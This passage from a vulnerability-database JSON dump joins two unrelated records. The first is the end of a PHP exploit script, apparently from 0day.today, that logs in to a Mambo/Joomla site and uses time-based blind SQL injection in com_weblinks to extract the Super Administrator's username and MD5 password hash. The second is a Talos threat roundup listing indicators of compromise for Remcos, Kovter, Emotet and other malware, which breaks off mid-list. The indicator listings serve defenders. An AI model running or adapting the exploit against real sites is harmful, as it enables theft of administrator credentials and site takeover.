false;}\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$user=$argv[3];\r\n$pass=$argv[4];\r\n$port=80;\r\n$prefix=\"mos_\";\r\n$proxy=\"\";\r\nfor ($i=5; $i<=$argc-1; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-T\")\r\n{\r\n $prefix=str_replace(\"-T\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\n$data =\"username=\".$user;\r\n$data.=\"&passwd=\".$pass;\r\n$data.=\"&remember=yes\";\r\n$data.=\"&option=login\";\r\n$data.=\"&Submit=login\";\r\n$data.=\"&op2=login\";\r\n$data.=\"&lang=english\";\r\n$data.=\"&return=\".urlencode(\"http://\".$host.$path);\r\n$data.=\"&message=0\";\r\n$packet =\"POST \".$p.\" HTTP/1.0\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nsendpacketii($packet);\r\n$temp=explode(\"Set-Cookie: \",$html);\r\n$cookie=\"\";\r\nfor ($i=1; $i<=count($temp)-1; $i++)\r\n{\r\n$temp2=explode(\" \",$temp[$i]);\r\n$cookie.=\" \".$temp2[0];\r\n}\r\nif ((strstr($cookie,\"=+;\")) | $cookie==\"\") {die(\"Unable to login...\");}\r\nelse\r\n{\r\necho \"Done...\\r\\ncookie -> \".$cookie.\"\\r\\n\";\r\n}\r\n\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\n$starttime=time();\r\n$sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(username,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\necho \"\\r\\n\".$sql.\"\\r\\n\";\r\n$sql=urlencode($sql);\r\n$data =\"title=\".$sql;\r\n$data.=\"&catid=2\";\r\n$data.=\"&url=http://www.google.com\";\r\n$data.=\"&description=\";\r\n$data.=\"&id=0\";\r\n$data.=\"&option=com_weblinks\";\r\n$data.=\"&task=save\";\r\n$data.=\"&ordering=0\";\r\n$data.=\"&approved=0\";\r\n$data.=\"&Returnid=0\";\r\n$packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Accept: text/plain\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Content-Type: 
application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\n//debug\r\n//echo quick_dump($packet).\"\\r\\n\";\r\nsendpacketii($packet);\r\n$endtime=time();\r\necho \"endtime -> \".$endtime.\"\\r\\n\";\r\n$difftime=$endtime - $starttime;\r\necho \"difftime -> \".$difftime.\"\\r\\n\";\r\nif ($difftime > 7) {$admin.=chr($i);echo \"admin -> \".$admin.\"[???]\\r\\n\";sleep(2);break;} //more than seven seconds? we succeed...\r\nif ($i==255) {die(\"Exploit failed...\");}\r\n}\r\n$j++;\r\n}\r\n\r\n$md5s[0]=0;//null\r\n$md5s=array_merge($md5s,range(48,57)); //numbers\r\n$md5s=array_merge($md5s,range(97,102));//a-f letters\r\n//print_r(array_values($md5s));\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\nfor ($i=0; $i<=255; $i++)\r\n{\r\nif (in_array($i,$md5s))\r\n{\r\n $starttime=time();\r\n $sql=\"99999' UNION SELECT IF ((ASCII(SUBSTRING(password,\".$j.\",1))=\".$i.\") & 1, benchmark(200000000,CHAR(0)),0) FROM \".$prefix.\"users WHERE usertype='Super Administrator'/*\";\r\n echo \"\\r\\n\".$sql.\"\\r\\n\";\r\n $sql=urlencode($sql);\r\n $data =\"title=\".$sql;\r\n $data.=\"&catid=2\";\r\n $data.=\"&url=http://www.google.com\";\r\n $data.=\"&description=\";\r\n $data.=\"&id=0\";\r\n $data.=\"&option=com_weblinks\";\r\n $data.=\"&task=save\";\r\n $data.=\"&ordering=0\";\r\n $data.=\"&approved=0\";\r\n $data.=\"&Returnid=0\";\r\n $packet =\"POST \".$p.\"index.php HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: Googlebot/2.1\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\";\r\n $packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n $packet.=\"Cookie: \".$cookie.\"\\r\\n\";\r\n $packet.=\"Content-Length: \".strlen($data).\"\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n //debug\r\n //echo quick_dump($packet).\"\\r\\n\";\r\n sendpacketii($packet);\r\n 
$endtime=time();\r\n echo \"endtime -> \".$endtime.\"\\r\\n\";\r\n $difftime=$endtime - $starttime;\r\n echo \"difftime -> \".$difftime.\"\\r\\n\";\r\n if ($difftime > 7) {$password.=chr($i);echo \"password -> \".$password.\"[???]\\r\\n\";sleep(2);break;}\r\n}\r\n if ($i==255) {die(\"Exploit failed...\");}\r\n }\r\n $j++;\r\n}\r\n//if you are here...\r\necho \"Exploit succeeded...\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\necho \"admin -> \".$admin.\"\\r\\n\";\r\necho \"password (md5) -> \".$password.\"\\r\\n\";\r\necho \"--------------------------------------------------------------------\\r\\n\";\r\n?>\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-01] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "d0da9c5cf87ed68134d789b648fdc1b8", "key": "href"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "modified"}, {"hash": "ac1b5a3bba4cdea6d4ea8e1717f91189", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "000977933f613211c59d6cc18b78170a", "key": "sourceData"}, {"hash": "cce4daee587c29bc064bbf6d2a882370", "key": "sourceHref"}, {"hash": "7ad97a3bd9d56ae489f68c15e7e12542", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"talosblog": [{"lastseen": "2019-11-08T23:03:05", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 1 and Nov. 8. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/blogs.cisco.com/2019/11/talos.tru_.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. 
\n \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.Remcos-7376444-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. Remcos is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Dropper.Kovter-7376187-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \nWin.Dropper.Emotet-7375156-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Malware.Trickbot-7374019-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts. \nWin.Malware.Phorpiex-7373816-1 | Malware | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. Phorpiex has been known to drop a wide range of payloads, including malware that sends spam emails, ransomware and cryptocurrency miners. \nWin.Malware.Zbot-7373691-1 | Malware | Zbot, also known as Zeus, is trojan that steals information such as banking credentials using methods like key-logging and form-grabbing. 
\nWin.Malware.DarkComet-7371375-1 | Malware | DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Packed.ZeroAccess-7370742-1 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.Remcos-7376444-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 8 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 8 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: exepath ` | 6 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: licence ` | 6 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 8 \n`XLR4615DFT-CRBSFT` | 8 \n`Global\\0e3e6d21-fc20-11e9-a007-00501e3ae7b5` | 1 \n`Global\\96ab2081-00fe-11ea-a007-00501e3ae7b5` | 1 \n`Global\\d24f50c1-00fe-11ea-a007-00501e3ae7b5` | 1 \n`Global\\77238861-00fe-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`179[.]33[.]68[.]255` | 4 \n`179[.]33[.]152[.]127` | 3 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`proyectobasevirtualcol[.]com` | 8 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\install.vbs` | 8 \n`%APPDATA%\\System32` | 8 \n`%APPDATA%\\System32\\Snk.exe` | 8 \n`%APPDATA%\\Runtime3` | 6 \n`%APPDATA%\\Runtime3\\1627.dat` | 6 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 5 \n \n#### File Hashes\n\n` 01f18d1d2a28f1fa3df286d745ebe04521031af989db17818db42f6118417f60 1c74e101e6c49184a2766afafc33ab421900927ca39bfb8afc6e0c29c1d4bc4a 2993970ed0df750fb8ead03397e7d209d50c790ccea889f8cd3a57a3257d229a 2a0933719e5f6762061641d337324fe2b9778e13ac4785dfce00b10e3134a7de 3a725a79cc91e882a52237eda542e29d44734c64fce0edd924e1fee62e69bead 44a4d693d208abf527c5d286fdb45791d6bc97fbda6857f2d952a659a39f02fd 46eb980bd84f49f16aab9a9af815caedfffe92ddf0db272b330f6a9b625716cf 5752b25814c46d5084fa204ab381a18ebfb75fd0229ddac048fc673607ae52c1 622bb6dc7e751fc9352e7a23c9bc3ccd2e1855f6d5c37656516a54fe63ae6230 70ee3b93a10475214f534c162c6923ccdff92873709e2912ffd208ad12d447fb 7df44706454b41154f074f55a4bb5c42942a7e4a2dd244dd3d979dd28f81c602 99f7c0b78dac66e3fb5c571c466004e97ef6a75662ed2b1a7e49d17f85fa66f0 a6f8cd54dcd6a563c2195964cf1a65ce0d558ef753d0d9d25618cf5bb24332d9 b1b18b3fb4c4da002c4f8449042569a53be13971036b2b15bccb8a31392e8ce8 d78ec2e34df6a80321bac318055f095f49f244117f0307e3c59aa7326f834ca7 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-lUlJ35zN-xo/XcWVXsyC1cI/AAAAAAAAC5E/Ut3WMwK5dSA5gSyDbjjDmw78ps9feWz1ACLcBGAsYHQ/s1600/46eb980bd84f49f16aab9a9af815caedfffe92ddf0db272b330f6a9b625716cf_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Kovter-7376187-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- 
\n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE \nValue Name: DisableOSUpgrade ` | 25 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\OSUPGRADE \nValue Name: ReservationsAllowed ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ssishoff ` | 25 \n`<HKCR>\\.16A05D ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: vrxzdhbyv ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: tbqjcmuct ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: tbqjcmuct ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: xedvpa ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: xedvpa ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: svdjlvs ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: svdjlvs ` | 25 \n`<HKCR>\\7B507\\SHELL\\OPEN\\COMMAND ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: lujyoqmfl ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: lujyoqmfl ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: tnzok ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: tnzok ` | 25 \n`<HKCU>\\SOFTWARE\\XVYG \nValue Name: usukxpt ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\XVYG \nValue Name: usukxpt ` | 25 \n`<HKCU>\\SOFTWARE\\<random, matching '[a-zA-Z0-9]{5,9}'> ` | 21 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 7 \n`<HKCU>\\SOFTWARE\\YNRVKCYV3 \nValue Name: kwS6y5 ` | 1 \nMutexes | Occurrences \n---|--- \n`EA4EC370D1E573DA` | 25 \n`A83BAA13F950654C` | 25 
\n`Global\\7A7146875A8CDE1E` | 25 \n`B3E8F6F86CDD9D8B` | 25 \n`408D8D94EC4F66FC` | 20 \n`Global\\350160F4882D1C98` | 20 \n`053C7D611BC8DF3A` | 20 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`48[.]35[.]9[.]231` | 2 \n`24[.]6[.]47[.]86` | 2 \n`53[.]51[.]100[.]34` | 2 \n`103[.]72[.]170[.]215` | 2 \n`100[.]65[.]74[.]134` | 2 \n`214[.]157[.]80[.]109` | 2 \n`53[.]189[.]39[.]167` | 2 \n`171[.]50[.]101[.]82` | 2 \n`186[.]88[.]125[.]16` | 2 \n`103[.]3[.]144[.]29` | 2 \n`191[.]63[.]106[.]220` | 2 \n`132[.]142[.]20[.]146` | 2 \n`185[.]144[.]48[.]120` | 2 \n`74[.]188[.]12[.]194` | 2 \n`151[.]185[.]129[.]250` | 2 \n`123[.]193[.]218[.]247` | 2 \n`7[.]184[.]47[.]209` | 2 \n`11[.]19[.]158[.]101` | 2 \n`89[.]73[.]101[.]218` | 2 \n`104[.]7[.]70[.]162` | 2 \n`111[.]104[.]240[.]101` | 2 \n`187[.]41[.]98[.]16` | 2 \n`39[.]158[.]228[.]212` | 2 \n`67[.]110[.]140[.]230` | 2 \n`87[.]88[.]172[.]42` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`cp[.]aliyun[.]com` | 2 \n`netcn[.]console[.]aliyun[.]com` | 2 \n`help[.]dreamhost[.]com` | 1 \n`api[.]w[.]org` | 1 \n`gmpg[.]org` | 1 \n`panel[.]dreamhost[.]com` | 1 \n`fonts[.]gstatic[.]com` | 1 \n`www[.]cloudflare[.]com` | 1 \n`httpd[.]apache[.]org` | 1 \n`www[.]dreamhost[.]com` | 1 \n`apps[.]digsigtrust[.]com` | 1 \n`apps[.]identrust[.]com` | 1 \n`cacerts[.]digicert[.]com` | 1 \n`www[.]wdos[.]net` | 1 \n`www[.]wddns[.]net` | 1 \n`www[.]wdcdn[.]com` | 1 \n`www[.]wdlinux[.]cn` | 1 \n`community[.]cambiumnetworks[.]com` | 1 \n`www[.]cambiumnetworks[.]com` | 1 \n`x[.]ss2[.]us` | 1 \n`www[.]wdcp[.]net` | 1 \n`docs[.]atlassian[.]com` | 1 \n`www[.]atlassian[.]com` | 1 \n`staging[.]theplaylist[.]net` | 1 \n`www[.]10dang[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%LOCALAPPDATA%\\39b03\\6a5cc.16a05d` | 25 \n`%LOCALAPPDATA%\\39b03\\7cbdf.bat` | 25 \n`%HOMEPATH%\\Local Settings\\Application Data\\2501\\1ffa.41d68` | 20 \n`%HOMEPATH%\\Local Settings\\Application Data\\2501\\aae7.bat` | 20 \n \n#### File Hashes\n\n` 07f6d9e83f537600594c31b3602732e673876773d011ad3827d3b4bfd90263b3 09decefe05efe8d4de76c83d2d25b3688a7aa8a5b64a66d9beda52f1cb84d3e1 1034ec321ee9aacbac4c6eb13c9b7c337ee203f7690c75b03be96f45e7131854 1b027ad776520157003006129c70ffcb5a6df709784553abffc39e231cc35ba4 32ef3ff9e7f8879fac649e0bd47c943c5c9ae41f92ee11223bcdf3e735fcdd4d 4bfd91dbacfc04dd91dd43c00209141b6b33b3ce7d7fce5a40a39190e1020044 535870f540ccf5fa55b7d45b46e12c7f6cca475d7d1ed53a825bf4a74a8deaad 568ed4d9b0ecc820f370f364a9135cb99fe5cc61b953156c8abf2d8b4455ea35 5dc8da99651c7a508063c24d05724b8ce59ad6ae5a7b71d3acf27aa9a46937e0 6159c80c21256280b87b9be98bce4ce08a62712a5472ce88ab91ec58a889a998 670d2eef908fdaccbad25d40f7fc35deaa8a27667c8ae9c64c3c8c3f7b47715f 699f6b25a4d720eec442dab827192c5c3089da861c3c891f08c327918e0034c3 6e99630d9605ab0cdd26b273edc288e70b9b927fbd10bb4c531bdbaedb832842 
716ca25938088e90d7529d396391ea45971e7716244684b7e431b46fae5d2f88 72301c500af238cd544b8208e3c5ea02d562143ab58a4fc7d429fb6dbdb5433a 77e117c5483524cd6bf8dcfa0b072d93644f71f15931b8f65be912dd2d4e0ac3 7803321e0e650f836a0260bd38dcac456e0bf822bd7d9159a03f509700f274a9 78bff6ee1f123cf5394c52b22f8bf282258684dc065d6fb3a6f7f11bb0dbb44c 7f9c7a64e9d7e46b31d842401064701c4cbaeee2d231b80e5221bc9b6dcad91c 886db07fb244827ecebfb8a0c807fc418d4e75699fe59d0a33203b2cacc30e08 94107471babcc12730005b1e70af6f59559229a0d2d325c18f88e8990c54a73b 9c3bc6fffc73ce25bd3f178daf44625b1ee681c7593ceef31e76fb5a2387ecb5 9d5304e56d130aeef6505442550c7cf49e3710f2ab7f31a7dd7db4a151fc5862 9f8721f77785853fded20778388a436d3ddc74a5200265a95ce7e168318b5f6c a1885a9e550677d9bdfbfa79590d9025c006940e540a795ab3700d3e960dc3e0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-rjQIKflw3Ps/XcWVue7XNUI/AAAAAAAAC5M/MC1Pi9yDJ7YkS4zpK1HN1vJkDa4lZ6h2ACLcBGAsYHQ/s1600/6159c80c21256280b87b9be98bce4ce08a62712a5472ce88ab91ec58a889a998_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Emotet-7375156-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Type ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Start ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ErrorControl ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ImagePath ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: DisplayName ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: WOW64 ` | 
115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ObjectName ` | 115 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Description ` | 115 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 115 \n`Global\\M98B68E3C` | 115 \n`Global\\M3C28B0E4` | 42 \n`Global\\I3C28B0E4` | 42 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`173[.]194[.]68[.]108/31` | 74 \n`189[.]189[.]21[.]214` | 60 \n`17[.]36[.]205[.]74/31` | 59 \n`74[.]202[.]142[.]71` | 53 \n`185[.]94[.]252[.]27` | 50 \n`45[.]55[.]82[.]2` | 50 \n`37[.]187[.]5[.]82` | 50 \n`190[.]120[.]104[.]21` | 40 \n`172[.]217[.]10[.]83` | 38 \n`23[.]229[.]115[.]217` | 38 \n`74[.]202[.]142[.]33` | 37 \n`45[.]33[.]54[.]74` | 37 \n`54[.]38[.]94[.]197` | 33 \n`62[.]149[.]128[.]200/30` | 32 \n`74[.]202[.]142[.]98/31` | 29 \n`74[.]208[.]5[.]14/31` | 29 \n`172[.]217[.]3[.]115` | 28 \n`191[.]252[.]112[.]194/31` | 28 \n`74[.]208[.]5[.]2` | 27 \n`176[.]9[.]47[.]53` | 27 \n`196[.]43[.]2[.]142` | 27 \n`193[.]70[.]18[.]144` | 26 \n`220[.]194[.]24[.]10/31` | 25 \n`50[.]22[.]35[.]194` | 24 \n`173[.]201[.]192[.]229` | 22 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`smtpout[.]secureserver[.]net` | 69 \n`smtp[.]prodigy[.]net[.]mx` | 54 \n`smtp[.]alestraune[.]net[.]mx` | 37 \n`smtp[.]infinitummail[.]com` | 33 \n`secure[.]emailsrvr[.]com` | 32 \n`smtp[.]dsl[.]telkomsa[.]net` | 30 \n`imail[.]dahnaylogix[.]com` | 28 \n`smtp[.]orange[.]fr` | 28 \n`smtp[.]mail[.]com` | 27 \n`smtp[.]office365[.]com` | 26 \n`mail[.]cemcol[.]hn` | 25 \n`smtp[.]1and1[.]com` | 24 \n`smtp-mail[.]outlook[.]com` | 23 \n`smtp[.]mail[.]ru` | 22 \n`mail[.]aruba[.]it` | 21 \n`pop3s[.]aruba[.]it` | 21 \n`correo[.]puertotuxpan[.]com[.]mx` | 20 \n`smtp[.]zoho[.]com` | 19 \n`smtp[.]techcommwireless[.]com` | 19 \n`zmail2[.]tikona[.]co[.]in` | 19 \n`smtpout[.]asia[.]secureserver[.]net` | 18 \n`smtp[.]mail[.]me[.]com` | 18 \n`smtp[.]qiye[.]163[.]com` | 18 \n`mail[.]outlook[.]com` | 17 \n`smtp[.]aol[.]com` | 17 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\spooleripspsb.exe` | 2 \n`\\TEMP\\694.exe` | 2 \n`%SystemRoot%\\SysWOW64\\spooleripspsa.exe` | 1 \n`\\TEMP\\L6WtzMgB.exe` | 1 \n`\\TEMP\\wdEnqutV.exe` | 1 \n`\\TEMP\\pzcc3lk.exe` | 1 \n`\\TEMP\\p1cvp.exe` | 1 \n`\\TEMP\\ux68b0c6lxc0fow.exe` | 1 \n`\\TEMP\\z825f3w9uh.exe` | 1 \n`\\TEMP\\gcb5of4v1tlz.exe` | 1 \n`\\TEMP\\ezxnt4.exe` | 1 \n`\\TEMP\\39v3vti54d.exe` | 1 \n`\\TEMP\\tdr3z0u10.exe` | 1 \n`\\TEMP\\yqr4645h3g.exe` | 1 \n`\\TEMP\\70vol09busiw7g.exe` | 1 \n`\\TEMP\\2bn1wg8bam49.exe` | 1 \n`\\TEMP\\afoly3.exe` | 1 \n`\\TEMP\\yumjilsuex5ce.exe` | 1 \n`\\TEMP\\2gb7kk6.exe` | 1 \n`\\TEMP\\f80gj19dm6pg.exe` | 1 \n`\\TEMP\\itb9yhf.exe` | 1 \n`\\TEMP\\sd0ew7kemxl.exe` | 1 \n`\\TEMP\\9b65hy6s.exe` | 1 \n`\\TEMP\\5q1otsijpw2d6rr.exe` | 1 \n`\\TEMP\\002109r7ga.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 02fc8369a88b82e3f3071515dacd5d66dac4a7bbc30c0273ce94f1d1c17016c2 0358ed9153522829b222680b6308ca2bfbb9af02f7577527d290bd6b5a45741a 
05813a34ed66ce894edfe1283dcbb4aac108a27a9d100cd1beda364c3a9a14d8 05cb5ec98746d64d138330942f339979762f3d9e2103176927e5298aab38b44d 068c95ddf6682151bfac5a348f3cdc83dd28dbb3636945893c40919e5c2529f6 06bee1b52d91c40d92e37313f5a41dd75ccfe06f4081c8d82cc150de85afa8fc 07ee440c02863990aa804fe41894616f5a660a07cea93bf9f4e21b379637cd04 08a60b24edee93c10a2f7f88f771cada9d5fdb220e236ac7685bc5467187cc7d 09b5cd03af0aeff661f64799a67a1e4b68fe95ed8c19f33b9f79c6ba891e1961 0aef359713281304cb60b92f7f9a4f046e7ae0902809830a306e683830c0621e 0cc6fb091ca3119744ef99cc1a75bf093351962ede75fe01d9689ad6e611eed7 10f54c55d5df2aba0a5f86addb10e2b6022040f9e30541e865e823456526d181 1360747298f09ad4a3231036c557fddae2e65e0544fa2bcd42847fd13793eeeb 15683fc25f400427b06f471235d0080d9b340760e1cf0e53b402cc3f92724904 179dcfe6679c7d9e7527dbc7280807c7abe2ab8b6cd74671ca3a240bdb9f9b13 197b6142da885afd536a49e192dd6259abdb324bd3a278850c74b54d3ad819a4 